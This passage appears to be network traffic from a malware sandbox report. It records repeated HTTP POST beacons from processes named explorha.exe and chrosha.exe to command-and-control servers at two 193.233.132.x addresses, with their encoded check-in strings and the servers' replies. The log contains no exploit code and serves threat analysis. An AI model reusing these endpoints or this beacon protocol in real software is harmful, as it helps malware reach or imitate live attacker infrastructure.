                                                                                                                                                                                                                                      Apr 19, 2024 03:34:07.030046940 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:07.280863047 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      900192.168.2.550750193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:07.107389927 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:07.354238033 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      901192.168.2.550751193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:07.539735079 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:07.795268059 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      902192.168.2.550752193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:07.710942984 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:07.959954023 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      903192.168.2.550753193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:08.153892994 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:08.398806095 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      904192.168.2.550754193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:08.218807936 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:08.475684881 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      905192.168.2.550755193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:08.650383949 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:08.901345015 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      906192.168.2.550756193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:08.836236954 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:09.086503029 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      907192.168.2.550757193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:09.257383108 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:09.498687029 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      908192.168.2.550758193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:09.350935936 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:09.602930069 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      909192.168.2.550759193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:09.752937078 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:10.004782915 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      910192.168.2.550760193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:09.961931944 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:10.204410076 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      911192.168.2.550761193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:10.371602058 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:10.622262001 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      912192.168.2.550762193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:10.446630955 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:10.688627005 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      913192.168.2.550763193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:10.872971058 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:11.124805927 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      914192.168.2.550764193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:11.052632093 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:11.297044992 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      915192.168.2.550765193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:11.246938944 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:11.494575024 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
